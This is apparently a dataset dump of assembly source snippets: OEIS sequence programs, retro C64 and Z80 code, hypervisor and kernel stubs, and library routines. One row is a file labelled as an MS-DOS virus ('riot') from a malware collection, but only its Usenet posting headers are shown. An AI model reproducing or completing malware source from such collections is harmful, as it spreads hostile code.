; 6,18,37,64,100,146,203,272,354,450,561,688,832,994,1175,1376,1598,1842,2109,2400,2716,3058,3427,3824,4250,4706,5193,5712,6264,6850,7471,8128,8822,9554,10325,11136,11988,12882,13819,14800,15826,16898,18017,19184,20400,21666,22983,24352,25774,27250,28781,30368,32012,33714,35475,3729... |
gbhv/vmxdefs.asm | wangchen1174/gbhv | 1 | 205872 |
EXTERN HvInitializeLogicalProcessor : PROC
EXTERN HvHandleVmExit : PROC
EXTERN HvHandleVmExitFailure : PROC
.CODE
; Saves all general purpose registers to the stack
; RSP is read from VMCS, so there's a placeholder.
; https://github.com/asamy/ksm/blob/e7e24931c9df26c33d6e2a0ea9a44c78d3ced7a6/vmx.asm#L41
; Sizeof = 1... |
oeis/019/A019742.asm | neoneye/loda-programs | 11 | 205873 | <filename>oeis/019/A019742.asm
; A019742: Expansion of 1/((1-4x)(1-10x)(1-11x)).
; Submitted by <NAME>(s2)
; 1,25,431,6365,86511,1117605,13957591,170189245,2038704671,24092243285,281680643751,3265150951725,37583315950831,430083097386565,4897580558961911,55540052099419805,627607236896972991,7070346261080123445,794404754... |
1571/64tass/lccutil1.asm | silverdr/assembly | 23 | 205874 | <filename>1571/64tass/lccutil1.asm
; * utility routines
jerrr ldy jobn ; return job code
sta jobs,y
lda gcrflg ; test if buffer left gcr
beq + ; no
jsr jwtobin ; convert back to binary
+ jsr trnoff ; start timeout on drive
ldx savs... |
test/ctctest.asm | ceharris/sbz80 | 0 | 205875 | RAM .equ $4000
ROMSZ .equ $2000
MODE .equ $01
MODREG .equ $ff
ISRTAB .equ $0100
CTC0 .equ $e0
CTC1 .equ $e1
CTC2 .equ $e2
CTC3 .equ $e3
CTCVEC .equ 0
CTCCTL .equ 10100101b
CTCTC .equ 9
IOREG .equ $f0
LEDBLINK .equ $01 ; blue LED will indicate we're alive
LEDSECS .equ $02 ; white LED will be used to b... |
oeis/142/A142424.asm | neoneye/loda-programs | 11 | 205877 | <gh_stars>10-100
; A142424: Primes congruent to 12 mod 49.
; Submitted by <NAME>
; 61,257,1237,1433,1531,2609,2707,2903,3001,3491,4079,4177,4373,5059,5647,5843,6529,6823,7019,7411,7607,7901,8293,8783,9371,10253,10939,11527,11821,12409,12703,12899,13291,13487,13781,13879,14173,14369,14957,15349,15643,15937,16231,16427,1... |
src/src/c/borlandc/dpmi32/int386.asm | amindlost/wdosx | 7 | 205878 | .386
.model flat,C
EXTRN _genericInterrupt:NEAR
EXTRN _doserrno:DWORD
EXTRN errno:DWORD
EXTRN segread:NEAR
PUBLIC int386
PUBLIC int386x
; Note that the Borland routine had a bug that made it impossible to
; pass another DS: selector. Second one is that esi is not preserved upon
; return from the interrupt. The... |
hook.asm | fluffysheap/SFVNetcodeFix | 24 | 205880 | EXTERN UpdateTimestampsOrig: QWORD
_TEXT SEGMENT
UpdateTimestampsOrigWrapper PROC
; Overwritten instructions
mov [rsp+18h], rbx
push rdi
sub rsp, 30h
mov rbx, rcx
mov rax, UpdateTimestampsOrig
add rax, 0Dh
jmp rax
UpdateTimestampsOrigWrapper ENDP
_TEXT ENDS
END |
software/minol/source/commands/print.asm | paulscottrobson/retrochallenge-jan-2016 | 0 | 205881 | <gh_stars>0
; ****************************************************************************************************************
; ****************************************************************************************************************
;
; PR command
;
; ***********************************************... |
packages/external/libmpg123-1.22.x/src/asm_nasm/dct64_sse_float.asm | sezero/SDL2-OS2 | 2 | 205882 | <reponame>sezero/SDL2-OS2
; 1 "dct64_sse_float.S"
; 1 "<built-in>"
; 1 "<command line>"
; 1 "dct64_sse_float.S"
; 9 "dct64_sse_float.S"
; 1 "mangle.h" 1
; 13 "mangle.h"
; 1 "config.h" 1
; 14 "mangle.h" 2
; 1 "intsym.h" 1
; 15 "mangle.h" 2
; 10 "dct64_sse_float.S" 2
; 22 "dct64_sse_float.S"
%include "asm_n... |
11_01PrintAT/bak/11_01PrintAT.asm | phaze101/C64-Bedtime-Coding-Public | 0 | 205883 | ;============================================================================
; C64 Bedtime Coding
; By <NAME>
;
; Article 11 - Example 01
;============================================================================
; I wish to thank all those that sent me emails or get in touch with me
; regarding this seri... |
programs/oeis/071/A071575.asm | neoneye/loda | 22 | 205885 | ; A071575: Number of iterations of cototient(n) needed to reach 1 (cototient(x) = x-phi(x)).
; 0,1,1,2,1,3,1,3,2,4,1,4,1,4,2,4,1,5,1,5,3,5,1,5,2,5,3,5,1,6,1,5,2,6,2,6,1,6,3,6,1,7,1,6,4,6,1,6,2,7,2,6,1,7,3,6,4,7,1,7,1,6,4,6,2,7,1,7,3,7,1,7,1,7,3,7,2,8,1,7,4,8,1,8,4,7,2,7,1,8,2,7,3,7,2,7,1,7,4,8
lpb $0
mov $2,$0
seq... |
src/kernel/paging.asm | bbworld1/egg-kernel | 8 | 205887 | GLOBAL loadPageDirectory
GLOBAL enablePaging
GLOBAL invalidateMapping
GLOBAL flushAllPages
; C prototype: void loadPageDirectory(uint32_t *pageDirectory)
; Put pointer to page directory in CR3
loadPageDirectory:
; Function prologue
push ebp
mov ebp, esp
; Pop pointer
mov eax, [esp + 8]
mov cr... |
Transynther/x86/_processed/AVXALIGN/_ht_st_zr_un_/i3-7100_9_0xca_notsx.log_21829_654.asm | ljhsiun2/medusa | 9 | 205888 | .global s_prepare_buffers
s_prepare_buffers:
push %r11
push %r13
push %r15
push %rbp
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_A_ht+0x310a, %rsi
nop
nop
nop
nop
cmp $1204, %r11
movb $0x61, (%rsi)
nop
dec %rbp
lea addresses_WT_ht+0x1430a, %rdi
nop
nop
nop
nop
nop
xor %r13, %r13
mov (%rdi), %r15d
nop
nop
nop
... |
oeis/037/A037783.asm | neoneye/loda-programs | 11 | 205889 | <reponame>neoneye/loda-programs
; A037783: Base 8 digits are, in order, the first n terms of the periodic sequence with initial period 3,1,2,0.
; Submitted by <NAME>
; 3,25,202,1616,12931,103449,827594,6620752,52966019,423728153,3389825226,27118601808,216948814467,1735590515737,13884724125898,111077793007184,8886223440... |
src/cart.asm | giomba/snake6502 | 1 | 205890 | processor 6502
SEG.U zeropageSegment
org $02
INCLUDE "zeropage.asm"
SEG cartridgeSegment
org $8000
cartridge SUBROUTINE
WORD .coldstart
WORD .warmstart
; CBM80 in PETSCII (cartridge signature for autostart)
BYTE #$c3,#$c2,#$cd,#$38,#$30
.coldstart:
sei
stx $d016
... |
libsrc/_DEVELOPMENT/stdio/c/sccz80/gets.asm | teknoplop/z88dk | 0 | 205891 |
; char *gets(char *s)
INCLUDE "clib_cfg.asm"
SECTION code_clib
SECTION code_stdio
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
IF __CLIB_OPT_MULTITHREAD & $02
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
PUBLIC gets
EXTERN asm_gets
defc gets = asm_gets
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
ELSE
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
PUBLIC gets
EX... |
oeis/312/A312935.asm | neoneye/loda-programs | 11 | 205892 | <filename>oeis/312/A312935.asm
; A312935: Coordination sequence Gal.4.105.1 where G.u.t.v denotes the coordination sequence for a vertex of type v in tiling number t in the Galebach list of u-uniform tilings.
; Submitted by <NAME>(s3)
; 1,4,9,13,18,22,28,32,37,41,46,50,54,59,63,68,72,78,82,87,91,96,100,104,109,113,118,... |
target/cos_117/disasm/iop_overlay1/HSXI.asm | jrrk2/cray-sim | 49 | 205893 | <filename>target/cos_117/disasm/iop_overlay1/HSXI.asm
0x0000 (0x000000) 0xEC00- f:00166 d: 0 | IOB , fn006
0x0001 (0x000002) 0x30C1- f:00030 d: 193 | A = (OR[193])
0x0002 (0x000004) 0x299B- f:00024 d: 411 | OR[411] = A
0x0003 (0x000006) 0x319B- ... |
bootsector.asm | mytechnotalent/toyos | 2 | 205895 | mov bp, 0xffff ; set the stack base
mov sp, bp ; set the top of the stack to base
call set_video_mode
call get_char_input
jmp $
set_video_mode:
mov al, 0x03 ; 80x25 8x8 640x200 16 gray
mov ah 0x00
int 0x10
ret
get_char_input:
xor ah, ah ; wait for a numeric char
... |
oeis/025/A025565.asm | neoneye/loda-programs | 11 | 205896 | ; A025565: a(n) = T(n,n-1), where T is array defined in A025564.
; Submitted by <NAME>
; 1,2,4,10,26,70,192,534,1500,4246,12092,34606,99442,286730,829168,2403834,6984234,20331558,59287740,173149662,506376222,1482730098,4346486256,12754363650,37461564504,110125172682,323990062452,953883382354,2810310510110,8284915984726... |
programs/oeis/140/A140683.asm | karttu/loda | 1 | 205897 | <reponame>karttu/loda
; A140683: a(n) = 3*(-1)^(n+1)*2^n - 1.
; -4,5,-13,23,-49,95,-193,383,-769,1535,-3073,6143,-12289,24575,-49153,98303,-196609,393215,-786433,1572863,-3145729,6291455,-12582913,25165823,-50331649,100663295,-201326593,402653183,-805306369,1610612735,-3221225473,6442450943,-12884901889,25769803775,-51... |
os/src/entry.asm | HuJJ-NB/ruianOS | 1 | 205899 | <filename>os/src/entry.asm
.section .text.entry
.globl _start
_start:
la sp, boot_stack_base
call rust_init_entry
.section .bss.stack
.globl boot_stack
boot_stack:
.space 4096 * 16
.globl boot_stack_base
boot_stack_base:
|
simd/jfdctfst-mmx.asm | imxiangpeng/libjpeg_turbo | 2,151 | 205900 | <filename>simd/jfdctfst-mmx.asm<gh_stars>1000+
;
; jfdctfst.asm - fast integer FDCT (MMX)
;
; Copyright 2009 Pierre Ossman <<EMAIL>> for Cendio AB
;
; Based on
; x86 SIMD extension for IJG JPEG library
; Copyright (C) 1999-2006, MIYASAKA Masaru.
; For conditions of distribution and use, see copyright notice in jsimdext... |
constants/sprite_constants.asm | Ebernacher90/pokecrystal-allworld | 0 | 205901 | <reponame>Ebernacher90/pokecrystal-allworld
; sprite ids
; OverworldSprites indexes (see data/sprites/sprites.asm)
const_def
const SPRITE_NONE ; 00
const SPRITE_CHRIS ; 01
const SPRITE_CHRIS_BIKE ; 02
const SPRITE_GAMEBOY_KID ; 03
const SPRITE_SILVER ; 04
const SPRITE_OAK ; 05
const SPRITE_RED ; 06
const SPRIT... |
example_02_playback.asm | biermanncarl/cx16-concerto | 4 | 205902 | ; Copyright 2021 <NAME>
; Compile with: cl65 -t cx16 -o EXAMPLE02.PRG -C cx16-asm.cfg -u __EXEHDR__ "example_02_playback.asm"
.zeropage
.include "concerto_synth/synth_zeropage.asm"
.code
jmp start
; define a macro with the player address BEFORE including "concerto_synth/concerto_synth.asm"
concerto_playbac... |
iod/iob/schd.asm | olifink/smsqe | 0 | 205903 | <filename>iod/iob/schd.asm
; Buffering scheduler routine V2.00 1989 <NAME> QJUMP
section iou
xdef iob_schd
xref gu_rchp
include 'dev8_keys_sys'
include 'dev8_keys_68000'
;+++
; This scheduler routine returns freed buffers to the heap
;--
iob_schd
move.w... |
libsrc/_DEVELOPMENT/stdio/c/sccz80/fmemopen_callee.asm | meesokim/z88dk | 0 | 205904 | <reponame>meesokim/z88dk
; FILE *fmemopen(void *buf, size_t size, const char *mode)
SECTION code_stdio
PUBLIC fmemopen_callee
EXTERN asm_fmemopen
fmemopen_callee:
pop hl
pop de
pop bc
ex (sp),hl
jp asm_fmemopen
|
oeis/234/A234617.asm | neoneye/loda-programs | 11 | 205906 | <reponame>neoneye/loda-programs
; A234617: Numbers of undirected cycles in the 2n-crossed prism graph.
; Submitted by <NAME>
; 6,28,107,380,1345,4878,18219,69736,271589,1069538,4240351,16877532,67325913,268902358,1074741203,4297097168,17184391117,68729044938,274898091975,1099554095044,4398135640001,17592372690878,70369... |
oeis/020/A020786.asm | neoneye/loda-programs | 11 | 205907 | ; A020786: Decimal expansion of 1/sqrt(29).
; Submitted by <NAME>
; 1,8,5,6,9,5,3,3,8,1,7,7,0,5,1,8,6,3,1,4,6,5,7,6,2,2,3,8,4,6,2,1,8,2,6,0,5,6,1,9,0,0,6,9,5,2,2,9,1,3,0,6,4,9,5,7,5,1,8,5,8,1,6,2,0,7,4,7,0,5,5,0,4,4,2,3,3,3,0,5,8,3,7,5,0,5,6,3,3,7,2,9,9,3,0,4,6,7,1,8
mov $1,1
mov $2,1
mov $3,$0
add $3,8
mov $4,$0
add ... |
Working Disassembly/General/Sprites/Clamer/DPLC - Clamer.asm | TeamASM-Blur/Sonic-3-Blue-Balls-Edition | 5 | 205908 | <filename>Working Disassembly/General/Sprites/Clamer/DPLC - Clamer.asm
PLC_361A78: dc.w Frame_361A8E-PLC_361A78
dc.w Frame_361A92-PLC_361A78
dc.w Frame_361A96-PLC_361A78
dc.w Frame_361A9A-PLC_361A78
dc.w Frame_361A9E-PLC_361A78
dc.w Frame_361AA2-PLC_361A78
dc.w Frame_361AA6-PLC_361A78
dc.w Frame_361AAA-PL... |
Transynther/x86/_processed/NONE/_xt_sm_/i7-7700_9_0xca_notsx.log_21829_635.asm | ljhsiun2/medusa | 9 | 205909 | <reponame>ljhsiun2/medusa
.global s_prepare_buffers
s_prepare_buffers:
push %r13
push %r8
push %r9
push %rax
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_WT_ht+0xb18a, %rax
nop
nop
sub %rdx, %rdx
and $0xffffffffffffffc0, %rax
vmovaps (%rax), %ymm2
vextracti128 $0, %ymm2, %xmm2
vpextrq $1, %xmm2, %r8
nop
nop
no... |
programs/oeis/120/A120190.asm | jmorken/loda | 1 | 205910 | <reponame>jmorken/loda
; A120190: a(1)=5; a(n)=floor((39+sum(a(1) to a(n-1)))/7).
; 5,6,7,8,9,10,12,13,15,17,20,23,26,30,34,39,44,51,58,66,76,86,99,113,129,147,168,192,220,251,287,328,375,429,490,560,640,731,836,955
mov $2,2
mov $7,$0
lpb $2
mov $0,$7
sub $2,1
add $0,$2
mov $5,0
lpb $0
sub $0,1
mov $... |
MSDOS/Virus.MSDOS.Unknown.riot.asm | fengjixuchui/Family | 3 | 205911 | <filename>MSDOS/Virus.MSDOS.Unknown.riot.asm
From netcom.com!ix.netcom.com!netnews Sat Nov 12 17:11:15 1994
Xref: netcom.com alt.comp.virus:200
Path: netcom.com!ix.netcom.com!netnews
From: <EMAIL> (Mr. G)
Newsgroups: alt.comp.virus
Subject: Re:Riot
Date: 12 Nov 1994 03:37:30 GMT
Organization: Netcom
Lines: 171
Distribu... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.